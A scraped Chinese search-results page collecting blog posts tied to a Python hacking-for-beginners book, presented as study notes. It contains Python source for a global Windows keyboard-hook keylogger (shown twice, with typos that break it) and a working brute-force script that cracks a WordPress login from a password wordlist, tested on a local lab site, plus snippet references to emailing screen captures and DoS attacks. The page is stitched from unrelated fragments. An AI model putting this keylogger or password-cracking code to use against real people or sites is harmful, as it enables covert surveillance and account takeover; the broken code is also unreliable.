精华内容
下载资源
问答
  • python黑客攻防入门
    2020-11-11 14:06:38

    最近从图书馆借到一本书《Python黑客攻防入门》,感觉里面的提供的代码模块对自己深有感触(主要我超菜),所以打算尝试写点小分析,希望大家能谅解本人的语言组织与技术分析。

    希望有人来讨论......

    python 3.7版本

    代码块

    import sys

    from ctypes import *

    from ctypes.wintypes import MSG

    from ctypes.wintypes import DWORD

    #调用WIN32中的API

    user32= windll.user32 #以windll加载user32.dll文件

    kernel=windll.kernel32 #加载kernel32.dll文件

    WH_KEYBOARD_LL=13 #安装一个监视低级键盘输入事件的钩子过程

    WM_KEYDOWN=0×0100 #按下一个非系统键时将消息发送给具有键盘焦点窗口(不与ALT键连用)

    CTRL_CODE =162

    #定义挂钩函数

    class KeyLogger:

    def __init__(self):

    #初始化

    self.lUser32 =user32

    self.hooked =None

    #装载钩子

    def installHookProc(self,pointer):

    self.hooked = self.lUser32.SetWindowsHookExA(

    WH_KEYBOARD_LL, #要监视的事件

    pointer, #指向钩子过程的指针

    kernel32.GetModuleHandleW(None), #要钩取的线程所属的DLL句柄,此函数返回

    0 #要钩取的线程ID,为0则表示全局钩子

    )

    if not self.hooked:

    return False #return false阻止向下执行

    return True #返回正常结果,正常执行

    #定义脱钩函数

    def uninstallHookProc(self):

    if self.hooked is None:

    return #return返回值为None,控制权交回

    self.lUser32.UnhookWindowsHookEx(self.hooked) #Unhook函数拆除之前设置的钩子

    self.hooked=None

    #获取函数指针

    def getFPTR(fn):

    CMPFUNC = CFUNCTYPE(c_int,c_int,c_int,POINTER(c_void_p))

    return CMPFUN(fn)

    #定义钩子过程

    def hookProc(nCode, wParam, lParam):

    if wParam is not WM_KEYDOWN:

    return user32.CallNextHookEx(keyLogger.hooked,nCode,wParam,lParam)

    hookedKey = chr(lParam[0])

    print(hookedKey)

    if(CTRL_CODE == int(lParam[0])):

    print("Ctrl pressed,call uninstallHook()")

    keyLogger.uninstallHookProc()

    sys.exit(-1)

    return user32.CallNextHookEx(keyLogger.hooked, nCode, wParam, lParam)

    #8.传递消息:GetMessageA()函数函数监视队列,消息进入队列后取出消息,并传递给勾连中的

    #第一个钩子

    def startKeyLog():

    msg = MSG()

    user32.GetMessageA(byref(msg), 0, 0, 0)

    #9.启动消息钩取,首先创造KeyLogger 类,然后installHookProc()函数设置钩子,同时

    #注册钩子过程回调函数。最后调用startKeyLog()函数,将进入队列的消息传递给勾连

    keyLogger = KeyLogger()

    pointer = getFPTR(hookProc)

    if keyLogger.installHookProc(pointer):

    print("installed keyLogger")

    startKeyLog()

    概念理解:

    钩子(hook):操作系统为有消息到来或发生鼠标点击、键盘输入等事件时,操作系统提供了中间拦截机制。钩子分为本地钩子和全局钩子。本地钩子针对特定线程设置,全局钩子针对操作系统中运行的所有线程设置。

    方法简要:

    使用user32.dll提供的SetWindowsHookExA()函数可以设置钩子。

    使用python中默认提供的ctypes模块,可以在python程序中调用DLL,使用C语言的变量类型。

    MSDN提供对WIN API的使用方法。

    总结:

    我靠,这程序运行出来命令行一直是黑屏,没反应。是因为360吗,反正我搞了两天这程序没成功,希望有大佬可以伸出援助之手,帮帮小弟...

    更多相关内容
  • Python黑客攻防入门

    万次阅读 2018-04-12 15:57:58
    点击打开链接 阿里云学生机1年114元限时活动(24岁以下都可以购买)https://promotion.aliyun.com/ntms/act/campus2018.html?userCode=a6violqw阿里云1888元红包:... 免费领取淘宝无...

    点击打开链接

    阿里云学生机1年114元限时活动(24岁以下都可以购买)https://promotion.aliyun.com/ntms/act/campus2018.html?userCode=a6violqw阿里云1888元红包:https://promotion.aliyun.com/ntms/yunparter/invite.html?userCode=a6violqw

    优库云是一个致力于分享学习干货、实用工具、优秀博客、面试宝典、互联网资讯技术、新闻观察、热点资讯、京东淘宝好物、优惠活动的平台。不定时推送,关注置顶公众号不错过任何福利!点击链接加入组织https://mp.weixin.qq.com/s/XHMsZaQYK-PkmudA_JXLSA

    展开全文
  • 最近从图书馆借到一本书《Python黑客攻防入门》,感觉里面的提供的代码模块对自己深有感触(主要我超菜),所以打算尝试写点小分析,希望大家能谅解本人的语言组织与技术分析。希望有人来讨论......python 3.7版本...

    最近从图书馆借到一本书《Python黑客攻防入门》,感觉里面的提供的代码模块对自己深有感触(主要我超菜),所以打算尝试写点小分析,希望大家能谅解本人的语言组织与技术分析。

    希望有人来讨论......

    python 3.7版本

    代码块

    import sys
    from ctypes import *
    from ctypes.wintypes import MSG
    from ctypes.wintypes import DWORD
    #调用WIN32中的API
    user32= windll.user32          #以windll加载user32.dll文件  
    kernel=windll.kernel32         #加载kernel32.dll文件
    
    WH_KEYBOARD_LL=13              #安装一个监视低级键盘输入事件的钩子过程
    WM_KEYDOWN=0×0100             #按下一个非系统键时将消息发送给具有键盘焦点窗口(不与ALT键连用)
    CTRL_CODE =162
    
    #定义挂钩函数
    class KeyLogger:
        def __init__(self):
            #初始化
            self.lUser32 =user32   
            self.hooked =None
        #装载钩子
        def installHookProc(self,pointer):
            self.hooked = self.lUser32.SetWindowsHookExA(
                    WH_KEYBOARD_LL,  #要监视的事件
                    pointer,         #指向钩子过程的指针
                    kernel32.GetModuleHandleW(None), #要钩取的线程所属的DLL句柄,此函数返回
                    0                                 #要钩取的线程ID,为0则表示全局钩子
                    )
            if not self.hooked:
                return False         #return false阻止向下执行
            return True              #返回正常结果,正常执行
       #定义脱钩函数
       def uninstallHookProc(self):
           if self.hooked is None:
               return                           #return返回值为None,控制权交回
           self.lUser32.UnhookWindowsHookEx(self.hooked)  #Unhook函数拆除之前设置的钩子
           self.hooked=None
       #获取函数指针
       def getFPTR(fn):
           CMPFUNC = CFUNCTYPE(c_int,c_int,c_int,POINTER(c_void_p))
        return CMPFUN(fn)
       #定义钩子过程
    def hookProc(nCode, wParam, lParam):
        if wParam is not WM_KEYDOWN:
            return user32.CallNextHookEx(keyLogger.hooked,nCode,wParam,lParam)
        hookedKey = chr(lParam[0])
        print(hookedKey)
        if(CTRL_CODE == int(lParam[0])):
            print("Ctrl pressed,call uninstallHook()")
            keyLogger.uninstallHookProc()
            sys.exit(-1)
        return user32.CallNextHookEx(keyLogger.hooked, nCode, wParam, lParam)
    
    #8.传递消息:GetMessageA()函数函数监视队列,消息进入队列后取出消息,并传递给勾连中的
    #第一个钩子
    def startKeyLog():
            msg = MSG()
            user32.GetMessageA(byref(msg), 0, 0, 0)
    
    #9.启动消息钩取,首先创造KeyLogger 类,然后installHookProc()函数设置钩子,同时
    #注册钩子过程回调函数。最后调用startKeyLog()函数,将进入队列的消息传递给勾连
    keyLogger = KeyLogger()
    pointer = getFPTR(hookProc)
    
    if keyLogger.installHookProc(pointer):
           print("installed keyLogger")
    
    startKeyLog()
    

    概念理解:

    钩子(hook):操作系统为有消息到来或发生鼠标点击、键盘输入等事件时,操作系统提供了中间拦截机制。钩子分为本地钩子和全局钩子。本地钩子针对特定线程设置,全局钩子针对操作系统中运行的所有线程设置。

    方法简要:

    使用user32.dll提供的SetWindowsHookExA()函数可以设置钩子。

    使用python中默认提供的ctypes模块,可以在python程序中调用DLL,使用C语言的变量类型。

    MSDN提供对WIN API的使用方法。

    总结

    我靠,这程序运行出来命令行一直是黑屏,没反应。是因为360吗,反正我搞了两天这程序没成功,希望有大佬可以伸出援助之手,帮帮小弟...

    展开全文
  • Python黑客攻防(八)密码破解攻击

    千次阅读 2020-07-16 09:36:34
    前言 进行黑客攻击通常需要做大量重复性...Python黑客攻防(四)搭建测试环境 教程 1.先开启靶场,浏览器输入http://127.0.0.1/wp-login.php,该页面可以输入用户名和密码,是我们的目标页面。 2.了解python是如何调

    前言

    进行黑客攻击通常需要做大量重复性工作。如果黑客直接通过浏览器攻击Web网站,就要不断手动修改输入值,并反复点击。但如果可以在应用程序内部访问Web网站并接收结果值,那么只需要使用简单的几行代码就能成功攻破目标网站。本篇文章讲解对网站的登入密码进行暴力破解。

    准备

    python环境

    靶场->Python黑客攻防(四)搭建测试环境

    教程

    1.先开启靶场,浏览器输入http://127.0.0.1/wp-login.php,该页面可以输入用户名和密码,是我们的目标页面。
    在这里插入图片描述
    2.了解python是如何调用web页面的。见下方代码及分析。在这里插入图片描述

    
    import urllib.request
    
    url = " http://127.0.0.1/wp-login.php"
    values = {'log': 'python', 'pwd': 'python1'}
    headers = {'User-Agent': 'Mozilla/4.0(compatible;MIS 5.5; Windows NT)'}
    data = urllib.parse.urlencode(values).encode(encoding='utf-8')
    request = urllib.request.Request(url, data, headers)  #创建Request对象
    response = urllib.request.urlopen(request) #调用Web页面使用Request对象返回结果值
    
    print("#UTL:%s"%response.geturl())  # 输出URL
    print("#CODE:%s"%response.getcode())  #输出状态码
    print("#INFO:%s"%response.info())  
    print("#DATA:%s"%response.read())
    

    分析:

    破解密码是我们的目的,这里我们假设已经知道用户名为python,键‘pwd’对应的值就是密码。这是我们要传送的值。我们先设置错误的密码,目的是查看返回给我们的数据。第五行headers是设置HTTP头值,第六行是将传送值设置为HTTP协议形式。第七行是创建Request对象,若只简单调用URL,放入URL参数即可。使用的是POST方法传递值或需要设置头部分值时,要分别将相应数据作为参数传入,运行结果见下图。
    在这里插入图片描述3.由上图的错误密码运行结果可知返回的URL是我们原始的URL,现在我们也点鼠标右键查看源代码。在这里插入图片描述HTML源代码含有多种标记,其中,需要掌握用于接收用户输人并传递给Web服务器的标记与字段。首先,标记的action字段用于指定接收用户输人的页面。标记的name字段用于设置保存用户输人值的变量名。从HTML源代码可知,用户名保存于log变量,密码保存于pwd变量,然后传送给Web服务器。

    现在我们尝试传入的是正确的密码,查看一下返回的数据。在这里插入图片描述在这里插入图片描述由上图可以看到返回的URL与上次的不同,并且URL中wp-admin可以很明显的区别于刚才的URL,这个我们后面可以利用。

    4.我们用密码字典来进行暴破,密码字典是很关键的一部分,我们可以通过对网站的信息收集,然后在线生成密码字典,提高破解速度。也可以下载专门的字典文件,这里我们在线生成一个密码字典,如下图,输入信息生成密码,然后创建文本,将密码粘贴进去。在这里插入图片描述在这里插入图片描述5.python密码破解

    # -*- coding: gbk -*-
    import urllib.request
    
    url = " http://127.0.0.1/wp-login.php"
    user_login = "python"
    
    wordlist = open(r"C:\Users\ASUS\Desktop\word.txt", "r",encoding='UTF-8')
    passwords = wordlist.readlines()
    for password in passwords:
        password = password.strip()
        values = {'log': user_login, 'pwd': password}
        data = urllib.parse.urlencode(values).encode(encoding='utf-8')
        request = urllib.request.Request(url, data)
        response = urllib.request.urlopen(request)
    
    
        try:
            idx = response.geturl().index('wp-admin')
    
        except:
            idx = 0
    
        if (idx>0):
            print("-"*10+"破解成功!密码为:"+password+"-"*10)
            break
        else:
            print("-"*10+"破解中.....正在尝试:"+password+"-"*10)
    
    wordlist.close()
    

    在这里插入图片描述这代码是在上一个代码的基础上添加了循环,读取字典及登录检测,登录检测就是第18行的对返回的URL进行是否包含管理页面地址的子字符串检测,以此来判断是否登录成功,现在运行代码,破解成功。在这里插入图片描述觉得不错可以关注微信公众号:黑客帮。

    在这里插入图片描述

    展开全文
  • 欢迎关注微信公众号:黑客帮 获取更多干货。 Dos攻击简介 DOS:中文名称是拒绝服务,一切能引起DOS行为的攻击都被称为DOS攻击。该攻击的效果是使得计算机或网络无法提供正常的服务。常见的DOS攻击有针对计算机网络...
  • 黑客攻防入门与进阶全程实录.pdf

    热门讨论 2011-12-17 01:11:19
    黑客攻防入门与进阶全程实录.pdf
  • Python黑客攻防(一)屏幕窃取

    千次阅读 2020-07-05 11:46:46
    转载自微信公众号:黑客帮,大神勿喷。 原理:使用SMTP协议及截图函数完成屏幕截取并自动发送到指定邮箱。 步骤: 1.邮箱开启SMTP服务,记住授权码。 登录网页版邮箱->设置->账户,找到SMTP服务将其开启,记住...
  • Python安全攻防-从入门到入狱

    万次阅读 多人点赞 2022-01-07 13:33:22
    Python安全攻防-从入门到入狱
  • 本文档是小小明个人的学习笔记,涵盖了正则表达式的各个方面,包括各种模式、分组、断言。 正则的匹配、查找、替换和切割一节包含各种典型的实际案例,各类使用场景。 正则匹配规则表,方便我们随时查询正则的规则,...
  • python黑客攻防(三)图片文件攻击

    千次阅读 2020-07-08 16:20:20
    本篇文章参考自《Python黑客攻防入门》,演示向一张位图(bmp后缀的图片文件)注入JavaScript脚本。 教程: 准备一张“.bmp”后缀的图片文件,可网上下载,也可自己创建。这里我用画图创建了一张,放在D盘,用010...
  • 原标题:黑客编程为什么首选Python语言?这里告诉你答案! 编程对于任何一个新手来说都不是一件容易的事情,特别是在中国基本以C语言作为启蒙语言的国家。python对于任何一个想学习的编程的人来说的确是一个福音,...
  • 如果选择一门编程语言来入门黑客攻防的话,你觉得哪个最合适?不如来试试Python,或许会是一次很好的尝试哦~Python 语言的优点目前,Python 在各领域都有着广泛的应用。由此可见,作为一种编程开发语言,Python 拥有...
  • 黑客防线攻防入门

    2013-11-07 16:35:47
    随着信息技术的发展,信息安全,网络安全,电脑安全,这样的字眼走入我们的视野中,这是一本关于黑客的书,能帮助你了解黑客常见的入侵手段,能帮助你更好的防护你的电脑。。
  • 一直在IT与硬件之间徘徊。也一直想成为一个黑客。但是,怎么说呢,看了很多相关文章,
  • 赠书!Python 安全攻防,终于来了!

    千次阅读 2020-10-22 14:40:00
    点击上方“逆锋起笔”,公众号回复pdf领取大佬们推荐的学习资料吴涛、方嘉明、吴荣德、徐焱编著在网络安全领域,是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,...
  • Python黑客攻防(二)键盘监听

    千次阅读 2020-07-05 12:46:54
    注:转载于微信公众号:黑客帮。已授权。本教程仅供学习交流,未经允许禁止转载。请勿用于非法用途,后果自负。大神勿喷。 前言:本篇教程演示如何编写一个键盘监听器,在内网中获取目标用户输入并保存。个人能力...
  • 支持功能强大的黑客攻击模块。Python语法简单,且拥有大量功能强大的库,与其他编程语言相比,使用Python能够更快速地开发应用程序。我们学习Python必然是为了找到高薪的工作,下面这些面试题是来自阿里、腾讯、字节...
  • B站 - 黑客攻防 入门到入狱 [网络安全] -笔记

    万次阅读 多人点赞 2020-06-18 16:12:13
    cc攻击和DDoS攻击: https://www.zhihu.com/question/279332078/answer/406403780 ← ← ← 刮刮乐 笔记来源B站视频(知识区>野生技术协会) 黑客攻防入门到入yu【網絡安全】:...一、文件上传漏洞原理 1、实验原理 2...
  • 白帽黑客网络攻防Python编程

    千人学习 2020-10-26 09:52:52
    本套教程采用最新版的Kali Linux系统为基础进行讲解,减少大家的入门难度,紧跟技术发展的步伐。   注意:视频教学内容仅用于网络安全渗透测试。其他行为,自己承担相应的责任,与作者无关。    
  • 今天以本篇文章来阐述一下,黑客为什么要选择Python编程语言进行入门学习?Python基本学习路线是什么?用Python语言实现的攻击脚本实例! 一、 为什么要选择Python编程语言进行入门学习? 1、Python语言自身的魅力...
  • 前文分享了Wireshark抓包原理知识,并结合NetworkMiner工具抓取了图像资源和用户名密码,本文将讲解Python网络攻防相关基础知识,包括正则表达式、Web编程和套接字通信。本文参考了爱春秋ADO老师的课程内容,这里也...
  • title: python入门 文章目录title: python入门一、变量二、输出三、字符串处理的常用方法四、列表五、元组、字典和迭代六、if选择七、异常try/except语句八、函数九、For循环十、文件十一、导入模块十二、sys模块十...
  • 在去年的双11送书的时候,其实送过几本Python黑客编程的书,说实话,国内编写或者翻译的这类书籍并没有太好的,说不好,主要原因是都停留在网络编程的简单应用上,入门尚可。 下面简单罗列几本,仅供...
  • web安全攻防入门培训

    2021-04-06 22:02:57
    本课程为有一定基础但是基础并不是特别牢固的同学准备,定级为入门到进阶课程,同时适合零基础学员学习。 课程内容主要包括漏洞利用进阶、漏洞挖掘基础、0day挖掘实战项目、渗透测试实战项目等。帮助大家了解并学习...
  • 本书前7章侧重入门知识,讲解了越狱环境会用到各种工具、ARM汇编基础以及应用逆向的常见方法等,后面8章侧重攻防实战和技巧。全书连贯,初学者几乎不用跳章节阅读。正如本书的书名昭示的那样,这是一本极负盛名的...
  • 现在,metasploit-framework完美搭档是msfvenom+msfcosole 本节课就开始带你入门和学习Msfvenom木马生成知识。 二、常见问题: 问:英语和数学基础一般,能学会吗? 答:这门课程专为小白设计,英语和数学基础一般...
  • 今天以本篇文章来阐述一下,黑客为什么要选择Python编程语言进行入门学习?Python基本学习路线是什么?用Python语言实现的攻击脚本实例! 一、 为什么要选择Python编程语言进行入门学习? 1、 P...
  • 其实送过几本Python黑客编程的书,说实话,国内编写或者翻译的这类书籍并没有太好的,说不好,主要原因是都停留在网络编程的简单应用上,入门尚可。下面简单罗列几本,仅供参考。《Python 黑帽子:黑客与渗透测试...
  • 原标题:黑客基础 编写Python爬虫入门步骤信息时代,数据就是宝藏。数据的背后隐含着无穷的宝藏,这些宝藏也许就是信息量所带来的商业价值,而大数据本身也将成为桌面上的筹码。黑客花无涯 带你走进黑客世界系列文章...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,223
精华内容 489
关键字:

python黑客攻防入门